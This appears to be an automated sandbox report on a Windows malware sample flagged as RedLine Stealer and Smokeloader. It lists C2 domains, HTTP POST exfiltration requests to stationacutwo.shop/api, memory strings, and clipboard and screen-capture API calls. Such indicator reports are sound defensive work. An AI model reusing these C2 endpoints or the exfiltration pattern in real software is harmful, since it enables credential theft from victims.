Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_028E1DF7

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: benchillppwo.shop
Source: Malware configuration extractor	URLs: publicitttyps.shop
Source: Malware configuration extractor	URLs: answerrsdo.shop
Source: Malware configuration extractor	URLs: radiationnopp.shop
Source: Malware configuration extractor	URLs: affecthorsedpo.shop
Source: Malware configuration extractor	URLs: bargainnykwo.shop
Source: Malware configuration extractor	URLs: bannngwko.shop
Source: Malware configuration extractor	URLs: bouncedgowp.shop
Source: Malware configuration extractor	URLs: stationacutwo.shop

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5438Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1304Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 576308Host: stationacutwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: stationacutwo.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: stationacutwo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stationacutwo.shop

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924065566.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/C
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973753508.0000000002B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/api
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/api8
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/li
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_0042E590 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042E590

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_0042E590 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042E590

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Code function: 0_2_0042EA70 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

0_2_0042EA70

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0041718B	0_2_0041718B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00422290	0_2_00422290
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00416C48	0_2_00416C48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00405460	0_2_00405460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00420CED	0_2_00420CED
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00421570	0_2_00421570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00417D08	0_2_00417D08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0043B630	0_2_0043B630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0040105C	0_2_0040105C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0042B8F8	0_2_0042B8F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0043A090	0_2_0043A090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0043B900	0_2_0043B900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00425920	0_2_00425920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_004369D0	0_2_004369D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_004089E0	0_2_004089E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00433980	0_2_00433980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_004399A0	0_2_004399A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00404A50	0_2_00404A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00422AC1	0_2_00422AC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00423354	0_2_00423354
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00407310	0_2_00407310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00421C19	0_2_00421C19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0043BC30	0_2_0043BC30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0043A480	0_2_0043A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00421C8F	0_2_00421C8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00406D00	0_2_00406D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0040FDA0	0_2_0040FDA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00439E00	0_2_00439E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_004096C0	0_2_004096C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0041D75D	0_2_0041D75D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00403F00	0_2_00403F00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00439F10	0_2_00439F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00405F30	0_2_00405F30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_0041FF85	0_2_0041FF85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_00401FA0	0_2_00401FA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028D03F4	0_2_028D03F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028C0007	0_2_028C0007
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B6197	0_2_028B6197
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B4167	0_2_028B4167
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B56C7	0_2_028B56C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028D17D7	0_2_028D17D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028E3BE7	0_2_028E3BE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028DBB5F	0_2_028DBB5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028EBB67	0_2_028EBB67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028EB897	0_2_028EB897
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B9927	0_2_028B9927
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028EBE97	0_2_028EBE97
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028C7F91	0_2_028C7F91
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028D2F17	0_2_028D2F17
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B6F67	0_2_028B6F67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B4CB7	0_2_028B4CB7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028E6C37	0_2_028E6C37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: 0_2_028B8C47	0_2_028B8C47

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: String function: 028B9607 appears 70 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: String function: 028C0197 appears 142 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: String function: 004093A0 appears 44 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Code function: String function: 0040FF30 appears 142 times

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7344 -s 1640

Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2156496909.0000000002AC1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
